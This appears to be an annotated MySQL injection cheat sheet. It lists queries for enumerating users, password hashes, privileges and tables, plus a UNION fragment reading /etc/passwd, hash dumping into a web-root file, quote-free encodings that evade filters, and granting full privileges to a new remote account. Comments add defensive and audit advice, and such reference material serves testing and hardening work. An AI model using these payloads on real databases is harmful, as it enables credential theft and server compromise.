Basic MySQL Injection Cheat Sheet

Version

# Server version string, read from the @@version system variable.
SELECT @@version;

Comments

# Two comment forms MySQL accepts: '#' runs to end of line, '/* */' is inline.
SELECT 1; #comment
SELECT /*comment*/1;

Current User

# user() reports the account name and host the client connected with;
# system_user() is a synonym for user().
SELECT user();
SELECT system_user();

List Users

# Reads the grant table directly; needs SELECT on the mysql schema,
# which ordinary application accounts should not hold.
SELECT user FROM mysql.user;

List Password Hashes

# Stored authentication hashes; same mysql-schema SELECT requirement as above.
# NOTE(review): the password column was dropped from mysql.user in later
# MySQL releases, where this statement fails with an unknown-column error.
SELECT host, user, password FROM mysql.user;

List Privileges

# Global grants as exposed by information_schema, the raw mysql.user flag
# columns, and schema-level grants. The information_schema views are derived
# from the mysql grant tables; mysql.user is the authoritative source.
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;

List column-level privileges:

# Column-level grants (derived from the mysql.columns_priv grant table).
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

List DBA Accounts

# Accounts holding SUPER, which overrides most server-side restrictions.
# Keep this list minimal and review it as part of routine access audits.
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';

Current Database

# Name of the session's default database, or NULL when none is selected.
SELECT database();

List Databases

# schemata lists the schemas the account has some privilege on; mysql.db lists
# schemas that carry explicit per-database grants.
SELECT schema_name FROM information_schema.schemata;
# DISTINCT is a keyword, not a function: the parentheses are accepted but redundant.
SELECT DISTINCT(db) FROM mysql.db;

List Columns

# Columns of every visible table, excluding two system schemas by name.
# Visibility is limited to tables the account holds some privilege on.
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

List Tables

# Tables of every visible schema, excluding two system schemas by name.
# Visibility is limited to tables the account holds some privilege on.
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

Find Tables From Column Name

# Tables that contain a column named 'username'; substitute the column of interest.
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

Select Nth Row

# Unqualified 'user' resolves against the session's default database, so this
# reads mysql.user only when mysql is the selected database. OFFSET is zero-based.
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # first row (row 1)
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # second row (row 2)

Select Nth Char

# substr(str, pos, len): pos is 1-based, so position 3 of 'abcd' is 'c'.
SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

# Integer bitwise AND; each statement tests a single bit of the left operand.
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char

# CHAR(n) builds a string from the given code point(s).
SELECT CHAR(65); # returns A

Char -> ASCII Value

# ASCII(str) returns the code of the first character of str.
SELECT ASCII('A'); # returns 65

Casting

# CAST target type names here (unsigned integer, char) are MySQL's, not ANSI.
SELECT CAST('1' AS unsigned integer); # returns 1
SELECT CAST('123' AS char); # returns 123

String Concatenation

# CONCAT() takes any number of arguments; in MySQL it returns NULL if any argument is NULL.
SELECT CONCAT('A','B'); # returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement

# IF(cond, a, b) is MySQL-specific; CASE (next section) is the portable equivalent.
SELECT IF(1=1,'foo','bar'); # returns 'foo'
SELECT IF(1=2,'foo','bar'); # returns 'bar'

Case Statement

# Portable CASE form of the conditional; ELSE is explicit so fall-through is visible.
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
SELECT CASE WHEN (1=2) THEN 'A' ELSE 'B' END; # returns B

Avoiding Quotes

# A hex literal is interpreted as a string, so input filtering that only strips
# quote characters does not prevent string values from reaching the query;
# binding values as parameters is the effective control.
SELECT 0x414243; # returns ABC using hexadecimal

Time Delay

# Evaluates MD5('A') 1,000,000 times purely to burn CPU time; the delay is what is
# observed. Such calls typically surface in the slow query log and the process
# list, which makes them a useful detection signal.
SELECT BENCHMARK(1000000,MD5('A'));

Local File Access

# The first line is a fragment that completes a vulnerable statement, not a
# standalone query. Both LOAD_FILE() and INTO DUMPFILE need the FILE privilege
# and are confined by the secure_file_priv setting (NULL disables them entirely);
# application accounts should never hold FILE.
...' UNION ALL SELECT LOAD_FILE('/etc/passwd')
# INTO DUMPFILE writes a single row with no formatting, unlike INTO OUTFILE.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Create Users

# Needs the CREATE USER privilege; unexpected rows in mysql.user are an audit finding.
CREATE USER test1 IDENTIFIED BY 'pass1';

Delete Users

# Needs the CREATE USER privilege (it covers DROP USER as well).
DROP USER test1;

Make User DBA

# Global grant of every privilege to test1 connecting from any host ('%').
# Needs GRANT OPTION plus the privileges being granted. Accounts with '%' host
# and broad global grants should be flagged when reviewing mysql.user.
GRANT ALL PRIVILEGES ON *.* TO test1@'%';

Location of DB files

# Filesystem path of the server's data directory, from the @@datadir system variable.
SELECT @@datadir;

Write query result into a file

# Writes the result to a file on the database server; needs FILE and a path
# permitted by secure_file_priv. The example path is inside a web root, which is
# why web-served directories must be neither inside secure_file_priv nor
# writable by the mysql OS user.
SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt';

Write query result into a file without using single quotes

# Every character of the two string values is spelled as a CHAR() code so the
# statement contains no quote characters; same FILE / secure_file_priv
# requirements as the literal form. NOTE(review): MySQL's grammar takes a
# string literal after INTO OUTFILE; whether a CONCAT() expression is accepted
# in that position is unverified here.
SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(114),CHAR(111),CHAR(111),CHAR(116),CHAR(39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(47),CHAR(116),CHAR(109),CHAR(112),CHAR(47),CHAR(112),CHAR(97),CHAR(115),CHAR(115),CHAR(101),CHAR(115),CHAR(46),CHAR(116),CHAR(120),CHAR(116),CHAR(39));

The query above is equivalent to:

# Plain-literal form of the preceding statement; needs FILE and a path
# permitted by secure_file_priv.
SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/tmp/passes.txt';